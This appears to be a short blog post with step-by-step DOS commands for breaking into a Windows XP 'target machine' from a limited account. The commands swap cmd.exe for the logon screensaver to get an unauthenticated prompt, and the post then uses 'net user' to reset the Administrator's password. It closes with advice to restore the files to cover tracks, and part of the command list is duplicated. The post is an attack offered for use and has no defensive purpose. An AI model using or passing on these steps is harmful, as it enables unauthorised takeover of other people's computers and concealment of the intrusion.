If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly :
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt without logging into XP.
Once this happens if you enter this command :
net user password
If the Administrator Account is called Frank and you want the password blah enter this
net user Frank blah
and this changes the password on franks machine to blah and your in.
Have Fun!
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
******************END***********************
0 comments:
Post a Comment